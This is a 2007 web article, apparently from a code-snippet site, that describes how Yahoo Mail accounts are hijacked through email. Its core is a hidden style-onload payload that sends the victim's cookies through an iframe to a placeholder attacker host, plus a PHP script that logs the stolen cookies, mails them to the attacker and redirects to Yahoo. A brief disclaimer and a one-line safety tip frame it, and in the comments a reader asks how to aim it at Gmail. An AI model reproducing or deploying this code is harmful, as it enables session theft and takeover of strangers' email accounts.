How hackers steal yahoo passwords

Keep your snippets safe! Read about our program and find out why you should use roScripts to save your code snippets.

get the feedDo you like our posts? Wanna stay informed and be the first to know when we publish new content?
subscribe to our newsletterWeekly newsletters with the best websites organized by categories and other news.

This article is ment to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone's info, password etc. It's purely informative. My yahoo Id was recently accessed by an unknown person which used it to send promotional emails to my list of friends who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends. Hopefully yahoo wakes up. I did a search on this new thing that they use, it had to be something on the "client side", a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it's easyer to attack than to deffend they say. It didn't take me too much to find this code which writes the recipient's cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim's yahoo email. The bug:

<DIV id=b style="VISIBILITY: hidden">
<STYLE onload="window.status=''; 
var x = escape(document.cookie).substr(0,1900); 
b.innerHTML='<iframe src=http://your-site-here.com/script.php?
id='+document.title.substring
(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\' 
frameborder=0 width=10 height=10></iframe>';" type=text/css>
</STYLE>
</DIV>

...which calls this php script:

$file="cookie.log";
if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){
$logcookie = $_REQUEST["cookie"];
$logcookie = rawurldecode($logcookie);
$logemail = $_REQUEST["id"];
$logemail = rawurldecode($logemail);
if (file_exists($file)) {
$handle=fopen($file, "r+");
$filecontence=fread($handle,filesize("$file"));
fclose($handle);
}
$handle=fopen($file, "w");
fwrite($handle, "$logemail - $logcookie\n$filecontence\n ");
//Writing email address and cookie then the rest of the log
fclose($handle);
mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n");
}
header("Location: http://mail.yahoo.com");

...which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DON'T EVER OPEN EMAILS FROM AN UNKNOWN SENDER.

More details & rating

How hackers steal yahoo passwords

Added by roScripts on April-18-2007, 3:53 pm

This article will show you how hackers steal yahoo passwords using just an email.

3 comments Bury

BookmarkCategory: PHP » Articles » Security systems

Comments

For coding help and further support please use the forum.

praveenvarghese02 says:Another doubts still persists... This can only trap cookies na? Reply please quick! My mail ID is there above..
2009-02-09 | 12:08 am
praveenvarghese02 says:Hi! I just got what you told just now! Can i add mail.google.com instead of Yahoo! Mail? Can that be used in the header -> Location part of the PHP script? Will that work! When you have time please mail me to praveen.supergenius@gmail.com
2009-02-09 | 12:07 am
praveenvarghese02 says:Heeyo! Lemme know where did you find the LOG file out from the Cookies folder. please let me know that. Is that hidden. I tried exploring using CMD too. But it failed to work. What to do? Please help me. Leave the PHP part to me. I juz wan help in case of that log file. My email ID is: praveen.supergenius@gmail.com Love, Praveen Varghese
2009-02-07 | 01:41 am

View all / Add comment

How hackers steal yahoo passwords

More details & rating

Related articles (53)

Comments

→ LATEST NEWS & ARTICLES

→ we recommend